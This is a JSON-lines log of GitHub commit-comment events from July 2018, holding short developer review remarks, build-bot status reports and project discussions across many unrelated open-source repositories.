{"id":"7977918977","type":"CommitCommentEvent","actor":{"login":"edannenberg"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29737764,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-17T16:40:29Z","updated_at":"2018-07-17T16:40:29Z","author_association":"CONTRIBUTOR","body":"> because its easier and less time consuming\r\n\r\nUnfortunately all users have to pay for that. It may also impact your time in the future when you need to untangle a messy git history.\r\n\r\nAnything that is not a fast-forward merge is a dirty merge. It's dirty because it introduces an extra commit to merge 2 diverged histories. The result is a network graph like [this](https://github.com/OpenMage/magento-lts/network), which is not fun to work with. Ideally that is a straight line. \r\n\r\nTo me as a user it is confusing if we are already on 1.9.3.8 but commits like `Update to 1.9.3.6` are merged now. I need to double check.This 13 commits or so, now sprinkled into the history, should have been one commit only: `Update to 1.9.3.9`. That would be easy and less time consuming for me as a user. ;P"}},"created_at":"2018-07-17T16:40:29Z"}
{"id":"7977919546","type":"CommitCommentEvent","actor":{"login":"willianjusten"},"repo":{"name":"willianjusten/spotify-wrapper"},"payload":{"comment":{"id":29737765,"position":19,"line":43,"path":"tests/index.spec.js","commit_id":"aa9e769454226e26639685c6391f6a61a0b940d9","created_at":"2018-07-17T16:40:36Z","updated_at":"2018-07-17T16:40:36Z","author_association":"OWNER","body":"Como nossa preocupação nesse arquivo não está nos resultados obtidos da Promise, mas sim nos outros métodos estarem rodando, eu posso simplesmente retornar uma Promise vazia."}},"created_at":"2018-07-17T16:40:36Z"}
{"id":"7977919842","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29737766,"position":null,"line":null,"path":null,"commit_id":"79db77c332b6868968fd4c4d3d1e0904369da789","created_at":"2018-07-17T16:40:39Z","updated_at":"2018-07-17T16:40:39Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-795](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-795).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-795-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T16:40:39Z"}
{"id":"7977922100","type":"CommitCommentEvent","actor":{"login":"filnet"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":29737769,"position":5,"line":19,"path":"src/osgEarthDrivers/cache_rocksdb/CMakeLists.txt","commit_id":"3d0d8d75f2dda7bf64521f72bc3a08f2bc62d6ab","created_at":"2018-07-17T16:41:06Z","updated_at":"2018-07-17T16:41:06Z","author_association":"CONTRIBUTOR","body":"seems unrelated and wrong"}},"created_at":"2018-07-17T16:41:06Z"}
{"id":"7977922340","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29737770,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T16:41:09Z","updated_at":"2018-07-17T16:41:09Z","author_association":"NONE","body":"как бы дальше комментировать этот модуль не имеет смысла, если он не работает\r\nесли будет рабочим, то уже можно обсудить насколько правильно он работает, что можно улучшить\r\nно сейчас он просто не работает"}},"created_at":"2018-07-17T16:41:09Z"}
{"id":"7977923127","type":"CommitCommentEvent","actor":{"login":"tjcurington"},"repo":{"name":"tjcurington/website"},"payload":{"comment":{"id":29737772,"position":null,"line":null,"path":null,"commit_id":"9dd520a3e03b903d9731e75e4fedf1aae3d75e99","created_at":"2018-07-17T16:41:18Z","updated_at":"2018-07-17T16:41:18Z","author_association":"OWNER","body":"### Lipsum Really?\r\n\r\nSo we really were not able to find better filler text?"}},"created_at":"2018-07-17T16:41:18Z"}
{"id":"7977926153","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737783,"position":20,"line":20,"path":"Lesson_2/6.rb","commit_id":"64c54e13fe175b0fcc0f0ffb80ec89685e3f8230","created_at":"2018-07-17T16:41:54Z","updated_at":"2018-07-17T16:41:54Z","author_association":"NONE","body":"Если в хэше purchase будет 2 ключа то получать значение будет можно так purchase[\"price\"]. Это лушче, чем делать из хэша массив ключей и обращаться по индексу. Лучше читается и легче поддается изменениям."}},"created_at":"2018-07-17T16:41:54Z"}
{"id":"7977926636","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737785,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:41:59Z","updated_at":"2018-07-17T16:41:59Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-17T16:41:59Z"}
{"id":"7977926859","type":"CommitCommentEvent","actor":{"login":"vincentkfu"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":29737787,"position":null,"line":null,"path":null,"commit_id":"bd71edcedc3dcbce4fe32357523434d8f249b02d","created_at":"2018-07-17T16:42:02Z","updated_at":"2018-07-17T16:42:02Z","author_association":"CONTRIBUTOR","body":"This fixed an issue I was seeing with a verify job using bsrange=4096:1M"}},"created_at":"2018-07-17T16:42:02Z"}
{"id":"7977928119","type":"CommitCommentEvent","actor":{"login":"AdamWill"},"repo":{"name":"poncovka/anaconda"},"payload":{"comment":{"id":29737790,"position":null,"line":null,"path":null,"commit_id":"2fca5086b4509fe1e7820cc8d3de248dbd814767","created_at":"2018-07-17T16:42:16Z","updated_at":"2018-07-17T16:42:16Z","author_association":"NONE","body":"So did I, at first, but I like what I came up with better, because it avoids basically getting the base type twice, which is what happens if we do first `_is_container_type` and then `_get_container_type`.\r\n\r\nSince all these methods are only used inside this one file anyway there doesn't seem any particularly great reason to retain `_is_container_type` rather than refactoring things so the discovery of the base type only happens *once*."}},"created_at":"2018-07-17T16:42:16Z"}
{"id":"7977931297","type":"CommitCommentEvent","actor":{"login":"cgewecke"},"repo":{"name":"cgewecke/eth-gas-reporter"},"payload":{"comment":{"id":29737795,"position":null,"line":null,"path":null,"commit_id":"9073fe7ea0eb7a158de3edba4faee606e5ad33e4","created_at":"2018-07-17T16:42:52Z","updated_at":"2018-07-17T16:42:52Z","author_association":"OWNER","body":"@iamchrissmith Ok cool - yes I should be able to peek at this pretty soon. Thanks for the tip."}},"created_at":"2018-07-17T16:42:52Z"}
{"id":"7977931459","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29737796,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T16:42:54Z","updated_at":"2018-07-17T16:42:54Z","author_association":"COLLABORATOR","body":"@jaycedowell  I am now looking into getting the GPU correlator started. It doesn't look like Bifrost has any sparse matrix functionality in it. \r\n\r\nI assume that I can't mix and match Bifrost rings with other CUDA datatypes. That is to say, if I write a sparse cuda block in C++  for EPIC I am constrained to doing it within the Bifrost framework.\r\n\r\nI guess what I'm trying to get at is: I am pretty sure I need to write a new c++ BF block, add it to the python namespace, rebuild BF and then test with that. Have you done something similar?"}},"created_at":"2018-07-17T16:42:54Z"}
{"id":"7977931827","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29737797,"position":null,"line":null,"path":null,"commit_id":"56a404154c9940aeb6eff3fcf1ebf189c2fac055","created_at":"2018-07-17T16:42:59Z","updated_at":"2018-07-17T16:42:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Edit an existing note](https://trello.com/c/lKpQyboy/5-edit-an-existing-note)"}},"created_at":"2018-07-17T16:42:59Z"}
{"id":"7977932641","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29737799,"position":null,"line":null,"path":null,"commit_id":"8f963145dc3044df2824086f0ddf91041c2019a4","created_at":"2018-07-17T16:43:09Z","updated_at":"2018-07-17T16:43:09Z","author_association":"OWNER","body":"Ahh, I see. I was trying to understand more about why there was the need for both qsearch and search."}},"created_at":"2018-07-17T16:43:09Z"}
{"id":"7977932664","type":"CommitCommentEvent","actor":{"login":"kontsevoy"},"repo":{"name":"gravitational/teleport"},"payload":{"comment":{"id":29737800,"position":10,"line":324,"path":"docs/2.7/admin-guide.md","commit_id":"37cec0a0c3ed251216c4af03eaed2e0183c4b161","created_at":"2018-07-17T16:43:09Z","updated_at":"2018-07-17T16:43:09Z","author_association":"CONTRIBUTOR","body":"there's a table with option resolution rules."}},"created_at":"2018-07-17T16:43:09Z"}
{"id":"7977933904","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29737805,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-17T16:43:24Z","updated_at":"2018-07-17T16:43:24Z","author_association":"MEMBER","body":"The how I have it? I did test it myself :|"}},"created_at":"2018-07-17T16:43:24Z"}
{"id":"7977935868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737810,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:43:48Z","updated_at":"2018-07-17T16:43:48Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-17T16:43:48Z"}
{"id":"7977936855","type":"CommitCommentEvent","actor":{"login":"sblack-usu"},"repo":{"name":"hydroshare/hydroshare"},"payload":{"comment":{"id":29737811,"position":null,"line":null,"path":null,"commit_id":"074f93cd8c698a1b176bf1f80ecc81b18e68f1db","created_at":"2018-07-17T16:43:59Z","updated_at":"2018-07-17T16:43:59Z","author_association":"CONTRIBUTOR","body":"That's true, but we could work around that by unzipping it to a folder with the same name.  If that's not acceptable, I think we should think of a standard way to mark files as hidden instead of just looking for _meta.xml and _resmap.xml at the end of filenames in CompositeResource.  This just feels brittle."}},"created_at":"2018-07-17T16:43:59Z"}
{"id":"7977937114","type":"CommitCommentEvent","actor":{"login":"posox"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29737812,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T16:44:03Z","updated_at":"2018-07-17T16:44:03Z","author_association":"OWNER","body":"Yes, we should use `kubernetes.v2`, but then we should change providerID to `kubernetes.v2`.\r\n\r\nSome code in Orca compares cloudProviderId and cluster type. They should be the same.\r\n\r\n@lwander @ethanfrogers what do you think about changing providerID?"}},"created_at":"2018-07-17T16:44:03Z"}
{"id":"7977939994","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29737816,"position":46,"line":87,"path":"contracts/Remittance.sol","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T16:44:34Z","updated_at":"2018-07-17T16:44:34Z","author_association":"OWNER","body":"Hmmm.. correct.. I think this is where our strategy of using external token genration system can come into picture. We can have a external / off-chain OTP generation / management system which can generate OR even regenerate OTP and provide unique token number against it. Those tokens are like `UUID` and are pretty difficult to repeat. So in our case, pseudo code of the procedure can end-up being `sendRemittance(sha3(externalOTPToken1,externalOTPToken2,receiverAddress,VoucherNumber))` this will always give a unique hash, even if OTPs are not unique and the mapping of these OTP's are securely stored within the OTP generation tools / appliances. As far as payment ID is concerned, I think adding it in the procedure signature and eventually in the event is a big plus as we can implement watchers on it as you illustrated in conditiona_mining.js.\r\nThanks again for your valuable comments.  "}},"created_at":"2018-07-17T16:44:34Z"}
{"id":"7977940838","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29737819,"position":25,"line":40,"path":"test/Remittance.js","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T16:44:44Z","updated_at":"2018-07-17T16:44:44Z","author_association":"OWNER","body":"Thanks @xavierlepretre  It's working now. My bad. I think I missed out your previous comment. Thanks again."}},"created_at":"2018-07-17T16:44:44Z"}
{"id":"7977940995","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"tabish121/qpid-jms"},"payload":{"comment":{"id":29737821,"position":34,"line":34,"path":"qpid-jms-client/src/test/java/org/apache/qpid/jms/provider/ProviderFutureFactoryTest.java","commit_id":"ea5394a8eedac50f631ccfb5bbc41ed412ff468d","created_at":"2018-07-17T16:44:46Z","updated_at":"2018-07-17T16:44:46Z","author_association":"COLLABORATOR","body":"Missing fail() inside the try block."}},"created_at":"2018-07-17T16:44:46Z"}
{"id":"7977941252","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29737822,"position":null,"line":null,"path":null,"commit_id":"8e24c104913bd6cea9c65820c720adc9e7c01e58","created_at":"2018-07-17T16:44:49Z","updated_at":"2018-07-17T16:44:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-130](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-130).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-130-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-17T16:44:49Z"}
{"id":"7977942113","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"tabish121/qpid-jms"},"payload":{"comment":{"id":29737827,"position":45,"line":45,"path":"qpid-jms-client/src/test/java/org/apache/qpid/jms/provider/ProviderFutureFactoryTest.java","commit_id":"ea5394a8eedac50f631ccfb5bbc41ed412ff468d","created_at":"2018-07-17T16:44:59Z","updated_at":"2018-07-17T16:44:59Z","author_association":"COLLABORATOR","body":"Missing fail() inside the try block."}},"created_at":"2018-07-17T16:44:59Z"}
{"id":"7977942327","type":"CommitCommentEvent","actor":{"login":"tabish121"},"repo":{"name":"tabish121/qpid-jms"},"payload":{"comment":{"id":29737829,"position":22,"line":49,"path":"qpid-jms-client/src/main/java/org/apache/qpid/jms/provider/amqp/AmqpProviderFactory.java","commit_id":"ea5394a8eedac50f631ccfb5bbc41ed412ff468d","created_at":"2018-07-17T16:45:02Z","updated_at":"2018-07-17T16:45:02Z","author_association":"OWNER","body":"It does do both just not on consecutive lines, I will rearrange to make it more clear\r\n"}},"created_at":"2018-07-17T16:45:02Z"}
{"id":"7977943342","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737831,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:45:14Z","updated_at":"2018-07-17T16:45:14Z","author_association":"NONE","body":"table-refactor (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T16:45:14Z"}
{"id":"7977946891","type":"CommitCommentEvent","actor":{"login":"fasterthanlime"},"repo":{"name":"itchio/butler"},"payload":{"comment":{"id":29737839,"position":null,"line":null,"path":null,"commit_id":"ba0c6430d89cb5d7e21a36d968fa26ee20ab0de7","created_at":"2018-07-17T16:45:57Z","updated_at":"2018-07-17T16:45:57Z","author_association":"MEMBER","body":"@leafo it already is! \r\n\r\n![image](https://user-images.githubusercontent.com/7998310/42832459-93044bee-89f1-11e8-9601-c00d53594331.png)\r\n\r\n![image](https://user-images.githubusercontent.com/7998310/42832480-a1f9df56-89f1-11e8-9a8c-93b80f5880e1.png)\r\n\r\n"}},"created_at":"2018-07-17T16:45:57Z"}
{"id":"7977948311","type":"CommitCommentEvent","actor":{"login":"MrPlusGH"},"repo":{"name":"MrPlusGH/NPlusMiner"},"payload":{"comment":{"id":29737841,"position":null,"line":null,"path":null,"commit_id":"deb4dd22224aef6121a919e1c2296495137341f1","created_at":"2018-07-17T16:46:13Z","updated_at":"2018-07-17T16:46:13Z","author_association":"OWNER","body":"Thanks,\r\nPlease report on #102 "}},"created_at":"2018-07-17T16:46:13Z"}
{"id":"7977952304","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737846,"position":23,"line":23,"path":"Lesson_2/5.rb","commit_id":"f4dde1360cd482a65ba8cc7b7f1be5c3364836d8","created_at":"2018-07-17T16:47:01Z","updated_at":"2018-07-17T16:47:01Z","author_association":"NONE","body":"Тут блок достаточно короткий, что-б сделать его однострочным"}},"created_at":"2018-07-17T16:47:01Z"}
{"id":"7977955453","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29737851,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T16:47:38Z","updated_at":"2018-07-17T16:47:38Z","author_association":"NONE","body":"Yes, it is a random thing, sometimes easier to reproduce but sometimes not so... but usually easy to reproduce on longer QSO's mainly if I'm far (like on other side of my home with some 3 rooms and a few concrete walls between hotspot and the radio). Look at my logs at my issue https://github.com/g4klx/MMDVMHost/issues/425 you can see duration and RSSI details.\r\n\r\nBtw, also JFYI \"noisefloor\" on my MMDVM_HS measured with mmdvmcal on RSSI Mode without any radio on tx is average 104 (according to df2et that means -104dbm, then s7), do you think it's a normal value?\r\n\r\nIf you want I test something or enable some specific debug logging just tell me what to do.\r\n\r\nThanks!"}},"created_at":"2018-07-17T16:47:38Z"}
{"id":"7977955857","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737852,"position":23,"line":23,"path":"Lesson_2/5.rb","commit_id":"f4dde1360cd482a65ba8cc7b7f1be5c3364836d8","created_at":"2018-07-17T16:47:43Z","updated_at":"2018-07-17T16:47:43Z","author_association":"NONE","body":"вокруг оператора \"-\" нужно поставить пробелы."}},"created_at":"2018-07-17T16:47:43Z"}
{"id":"7977961520","type":"CommitCommentEvent","actor":{"login":"gomesalexandre"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29737864,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-17T16:48:46Z","updated_at":"2018-07-17T16:48:46Z","author_association":"OWNER","body":"It is exported as an interface. But you're right that `jss.js` not being annotated with flow should not being able to import(and export) it, I am not sure how this resolves, this is a strange one "}},"created_at":"2018-07-17T16:48:46Z"}
{"id":"7977967250","type":"CommitCommentEvent","actor":{"login":"HvTr"},"repo":{"name":"HvTr/FirstRepo"},"payload":{"comment":{"id":29737868,"position":8,"line":22,"path":"Hello Again World/Hello Again World/Form1.cs","commit_id":"8d90416cd989846e3d50e37d2bf1d01f793a20e9","created_at":"2018-07-17T16:49:49Z","updated_at":"2018-07-17T16:49:49Z","author_association":"OWNER","body":"555"}},"created_at":"2018-07-17T16:49:49Z"}
{"id":"7977968710","type":"CommitCommentEvent","actor":{"login":"HvTr"},"repo":{"name":"HvTr/FirstRepo"},"payload":{"comment":{"id":29737870,"position":7,"line":25,"path":"Hello Again World/Hello Again World/Form1.cs","commit_id":"8d90416cd989846e3d50e37d2bf1d01f793a20e9","created_at":"2018-07-17T16:50:06Z","updated_at":"2018-07-17T16:50:06Z","author_association":"OWNER","body":"4weg"}},"created_at":"2018-07-17T16:50:06Z"}
{"id":"7977973158","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29737878,"position":null,"line":null,"path":null,"commit_id":"8f963145dc3044df2824086f0ddf91041c2019a4","created_at":"2018-07-17T16:50:57Z","updated_at":"2018-07-17T16:50:57Z","author_association":"NONE","body":"The main part is searching with reduced depth to find really good captures for cutoff. the qsearch is merely a filter to avoid doing the more costly search if it seems that this may not payoff."}},"created_at":"2018-07-17T16:50:57Z"}
{"id":"7977973784","type":"CommitCommentEvent","actor":{"login":"shritasharma"},"repo":{"name":"shritasharma/speedreaderAppmobile"},"payload":{"comment":{"id":29737879,"position":null,"line":null,"path":null,"commit_id":"34c1efae427d042e6f56b7ea2e7324c34186a339","created_at":"2018-07-17T16:51:04Z","updated_at":"2018-07-17T16:51:04Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T16:51:04Z"}
{"id":"7977979968","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29737893,"position":11,"line":11,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T16:52:14Z","updated_at":"2018-07-17T16:52:14Z","author_association":"NONE","body":"с этим модулем аналогичная проблемма - он не работает:\r\n```\r\n$ irb -r ./module.rb \r\n2.5.1 :001 > class A; include InstanceCounter; def initialize; register_instance; end; end;\r\n => :initialize \r\n2.5.1 :002 > a = A.new\r\nTraceback (most recent call last):\r\n        4: from /home/max/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `<main>'\r\n        3: from (irb):2\r\n        2: from (irb):2:in `new'\r\n        1: from (irb):1:in `initialize'\r\nNameError (undefined local variable or method `register_instance' for #<A:0x0000000000a95948>)\r\n2.5.1 :003 >\r\n```\r\nнадо начать с этого"}},"created_at":"2018-07-17T16:52:14Z"}
{"id":"7977981866","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737900,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:52:34Z","updated_at":"2018-07-17T16:52:34Z","author_association":"NONE","body":"table-refactor (nealkruis) - Win64-Windows-7-VisualStudio-14: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T16:52:34Z"}
{"id":"7977982728","type":"CommitCommentEvent","actor":{"login":"numjung1959"},"repo":{"name":"MetaMask/faq"},"payload":{"comment":{"id":29737902,"position":5,"line":24,"path":"COINBASE.md","commit_id":"c7140106094b59baef286042043d546ae1b2af50","created_at":"2018-07-17T16:52:44Z","updated_at":"2018-07-17T16:52:44Z","author_association":"NONE","body":"2min"}},"created_at":"2018-07-17T16:52:44Z"}
{"id":"7977982862","type":"CommitCommentEvent","actor":{"login":"TomAndrews"},"repo":{"name":"joshuaulrich/xts"},"payload":{"comment":{"id":29737903,"position":null,"line":null,"path":null,"commit_id":"50b2510a5407505e2a1d8c5c0c0e17fb899aaa5d","created_at":"2018-07-17T16:52:46Z","updated_at":"2018-07-17T16:52:46Z","author_association":"CONTRIBUTOR","body":"Should this instead be:\r\n `xx <- .Call(\"add_xtsCoreAttributes\", x, index, .indexCLASS, tzone, .indexCLASS,`\r\nI think this might fix #249.  Looking at the old version, I don't think tclass was ever used, but now it is getting passed through.\r\n\r\n"}},"created_at":"2018-07-17T16:52:46Z"}
{"id":"7977984657","type":"CommitCommentEvent","actor":{"login":"OpenUAS"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":29737912,"position":null,"line":null,"path":null,"commit_id":"e21d9512b47d3d8b51288c3f23d03378f3ad6f25","created_at":"2018-07-17T16:53:07Z","updated_at":"2018-07-17T16:53:07Z","author_association":"CONTRIBUTOR","body":"Holy cr*p, THX!!"}},"created_at":"2018-07-17T16:53:07Z"}
{"id":"7977989243","type":"CommitCommentEvent","actor":{"login":"johnmccutchan"},"repo":{"name":"google/vector_math.dart"},"payload":{"comment":{"id":29737922,"position":7,"line":7,"path":"changelog.md","commit_id":"501a779f3f1fba994ca210f7231fd0b4691017fc","created_at":"2018-07-17T16:54:03Z","updated_at":"2018-07-17T16:54:03Z","author_association":"COLLABORATOR","body":"What happened to v2.0.8?"}},"created_at":"2018-07-17T16:54:03Z"}
{"id":"7977991148","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29737923,"position":null,"line":null,"path":null,"commit_id":"964f8b867fd8701629b7006477a0e30cfb8705de","created_at":"2018-07-17T16:54:23Z","updated_at":"2018-07-17T16:54:23Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.17 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |    -6    |\n| `nodes_count`      |   118    |\n| `texts_passing`    |     1    |\n| `texts_total`      |    -2    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +15378 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | New      |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4458)*\n"}},"created_at":"2018-07-17T16:54:23Z"}
